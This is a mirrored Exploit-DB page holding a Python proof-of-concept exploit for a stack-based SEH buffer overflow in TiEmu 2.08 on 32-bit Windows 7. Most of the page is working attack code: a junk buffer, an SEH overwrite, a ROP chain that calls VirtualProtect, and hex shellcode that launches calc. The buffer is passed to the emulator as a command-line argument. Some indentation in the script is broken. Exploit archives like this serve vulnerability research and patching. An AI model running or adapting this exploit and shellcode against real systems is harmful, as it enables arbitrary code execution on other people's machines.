TiEmu 2.08 – Local Buffer Overflow - 体验盒子

作者： Juan Sacco
日期： 2017-05-30
类别：
local
平台：
windows
来源：https://www.exploit-db.com/exploits/42087/
#!/usr/bin/python
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
# Tested on: Windows 7 32 bits
#
# Description: TiEmu ( Texas Instrument Emulator ) 2.08 and prior is
# prone to a stack-based buffer overflow vulnerability because the
application fails to perform adequate
# boundary-checks on user-supplied input.
#
# What is TiEmu?
# TiEmu is a multi-platform emulator for TI89 / TI89 Titanium / TI92 / TI92+ / V200PLT hand-helds.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://lpg.ticalc.org/prj_tiemu/

import struct, subprocess, os
file = "C:/Program Files/TiEmu/bin/tiemu.exe"
junk ="A" * 452
nseh = struct.pack('L', 0x06eb9090)
seh = struct.pack('L', 0x6c3010ba) # pop ebx # pop ebp # ret-
libtifiles2-5.dll

def create_rop_chain():
rop_gadgets = [
0x75ecd264,# POP ECX # RETN [SHELL32.DLL]
0x711e1388,# ptr to &VirtualProtect() [IAT COMCTL32.DLL]
0x7549fd52,# MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll]
0x628daecc,# POP EBP # RETN [tcl84.dll]
0x76c319b8,# & push esp # ret[kernel32.dll]
0x7606c311,# POP EAX # RETN [SHELL32.DLL]
0xfffffdff,# Value to negate, will become 0x00000201
0x75de6a90,# NEG EAX # RETN [SHLWAPI.dll]
0x76c389d9,# XCHG EAX,EBX # RETN [kernel32.dll]
0x754f3b2f,# POP EAX # RETN [MSCTF.dll]
0xffffffc0,# Value to negate, will become 0x00000040
0x76b13193,# NEG EAX # RETN [USER32.dll]
0x76c38a09,# XCHG EAX,EDX # RETN [kernel32.dll]
0x757dfbf7,# POP ECX # RETN [ole32.dll]
0x71256c9b,# &Writable location [COMCTL32.DLL]
0x77048567,# POP EDI # RETN [RPCRT4.dll]
0x757e65e2,# RETN (ROP NOP) [ole32.dll]
0x76cd6ee4,# POP EAX # RETN [kernel32.dll]
0x90909090,# nop
0x76ac6d21,# PUSHAD # RETN [OLEAUT32.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

shellcode = "\x90"*6
shellcode += "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"

junk2 ="A" * 2000

buffer = junk+ nseh + seh + rop_chain + shellcode + junk2

try:
 print(buffer)
 subprocess.call([file, buffer])
except OSError as e:
 if e.errno == os.errno.ENOENT:
 print "TiEmu not found!"
 else:
print "Error executing exploit"
 raise